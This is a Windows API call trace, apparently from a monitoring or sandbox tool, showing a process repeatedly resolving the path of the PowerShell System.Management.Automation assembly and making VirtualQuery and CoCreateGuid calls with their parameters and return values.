[0079.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.903] VirtualQuery (in: lpAddress=0xcaeb0, lpBuffer=0xcbd70, dwLength=0x30 | out: lpBuffer=0xcbd70*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcba30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.903] VirtualQuery (in: lpAddress=0xcaeb0, lpBuffer=0xcbd70, dwLength=0x30 | out: lpBuffer=0xcbd70*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.903] VirtualQuery (in: lpAddress=0xcaf40, lpBuffer=0xcbe00, dwLength=0x30 | out: lpBuffer=0xcbe00*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.904] VirtualQuery (in: lpAddress=0xcaeb0, lpBuffer=0xcbd70, dwLength=0x30 | out: lpBuffer=0xcbd70*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.904] VirtualQuery (in: lpAddress=0xcaf40, lpBuffer=0xcbe00, dwLength=0x30 | out: lpBuffer=0xcbe00*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcba30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.904] VirtualQuery (in: lpAddress=0xcaeb0, lpBuffer=0xcbd70, dwLength=0x30 | out: lpBuffer=0xcbd70*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.905] VirtualQuery (in: lpAddress=0xcaf40, lpBuffer=0xcbe00, dwLength=0x30 | out: lpBuffer=0xcbe00*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.905] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.905] VirtualQuery (in: lpAddress=0xcaeb0, lpBuffer=0xcbd70, dwLength=0x30 | out: lpBuffer=0xcbd70*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.905] VirtualQuery (in: lpAddress=0xcaf40, lpBuffer=0xcbe00, dwLength=0x30 | out: lpBuffer=0xcbe00*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.905] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcba30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.905] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcba30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.905] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcba30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.905] VirtualQuery (in: lpAddress=0xcaeb0, lpBuffer=0xcbd70, dwLength=0x30 | out: lpBuffer=0xcbd70*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.906] VirtualQuery (in: lpAddress=0xcaf40, lpBuffer=0xcbe00, dwLength=0x30 | out: lpBuffer=0xcbe00*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.906] VirtualQuery (in: lpAddress=0xcaeb0, lpBuffer=0xcbd70, dwLength=0x30 | out: lpBuffer=0xcbd70*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.906] VirtualQuery (in: lpAddress=0xcaf40, lpBuffer=0xcbe00, dwLength=0x30 | out: lpBuffer=0xcbe00*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.907] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.907] VirtualQuery (in: lpAddress=0xcb950, lpBuffer=0xcc810, dwLength=0x30 | out: lpBuffer=0xcc810*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.907] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.907] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.907] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.907] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.907] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.908] VirtualQuery (in: lpAddress=0xcb950, lpBuffer=0xcc810, dwLength=0x30 | out: lpBuffer=0xcc810*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.908] VirtualQuery (in: lpAddress=0xcb950, lpBuffer=0xcc810, dwLength=0x30 | out: lpBuffer=0xcc810*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.909] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.941] VirtualQuery (in: lpAddress=0xcb950, lpBuffer=0xcc810, dwLength=0x30 | out: lpBuffer=0xcc810*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.966] VirtualQuery (in: lpAddress=0xcb040, lpBuffer=0xcbf00, dwLength=0x30 | out: lpBuffer=0xcbf00*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.966] VirtualQuery (in: lpAddress=0xcb0d0, lpBuffer=0xcbf90, dwLength=0x30 | out: lpBuffer=0xcbf90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.966] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.966] VirtualQuery (in: lpAddress=0xcb840, lpBuffer=0xcc700, dwLength=0x30 | out: lpBuffer=0xcc700*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.967] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.967] VirtualQuery (in: lpAddress=0xcb840, lpBuffer=0xcc700, dwLength=0x30 | out: lpBuffer=0xcc700*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.967] VirtualQuery (in: lpAddress=0xcb840, lpBuffer=0xcc700, dwLength=0x30 | out: lpBuffer=0xcc700*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.967] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.967] VirtualQuery (in: lpAddress=0xcb840, lpBuffer=0xcc700, dwLength=0x30 | out: lpBuffer=0xcc700*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.967] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.968] VirtualQuery (in: lpAddress=0xcb840, lpBuffer=0xcc700, dwLength=0x30 | out: lpBuffer=0xcc700*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.968] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.968] VirtualQuery (in: lpAddress=0xcb840, lpBuffer=0xcc700, dwLength=0x30 | out: lpBuffer=0xcc700*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.968] VirtualQuery (in: lpAddress=0xcb480, lpBuffer=0xcc340, dwLength=0x30 | out: lpBuffer=0xcc340*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.968] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.968] VirtualQuery (in: lpAddress=0xcb840, lpBuffer=0xcc700, dwLength=0x30 | out: lpBuffer=0xcc700*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.968] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.969] VirtualQuery (in: lpAddress=0xcb840, lpBuffer=0xcc700, dwLength=0x30 | out: lpBuffer=0xcc700*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.969] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x85cec760, Data2=0x5e1d, Data3=0x43d0, Data4=([0]=0xb3, [1]=0x97, [2]=0x5e, [3]=0x80, [4]=0xb7, [5]=0x4e, [6]=0xc, [7]=0x26))) returned 0x0
[0079.969] VirtualQuery (in: lpAddress=0xcb040, lpBuffer=0xcbf00, dwLength=0x30 | out: lpBuffer=0xcbf00*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.969] VirtualQuery (in: lpAddress=0xcb0d0, lpBuffer=0xcbf90, dwLength=0x30 | out: lpBuffer=0xcbf90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.970] VirtualQuery (in: lpAddress=0xcb2f0, lpBuffer=0xcc1b0, dwLength=0x30 | out: lpBuffer=0xcc1b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.970] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x70dae082, Data2=0xac71, Data3=0x4626, Data4=([0]=0xa8, [1]=0x8e, [2]=0xd6, [3]=0xd8, [4]=0x92, [5]=0x12, [6]=0x76, [7]=0x4b))) returned 0x0
[0079.970] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x85ed66d, Data2=0x408e, Data3=0x4a86, Data4=([0]=0xbd, [1]=0x9c, [2]=0xab, [3]=0x5c, [4]=0x57, [5]=0xff, [6]=0xde, [7]=0xc8))) returned 0x0
[0079.970] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x76013115, Data2=0x9d91, Data3=0x4bdc, Data4=([0]=0xa8, [1]=0x4e, [2]=0x2e, [3]=0x8b, [4]=0x2, [5]=0xde, [6]=0x4, [7]=0x9c))) returned 0x0
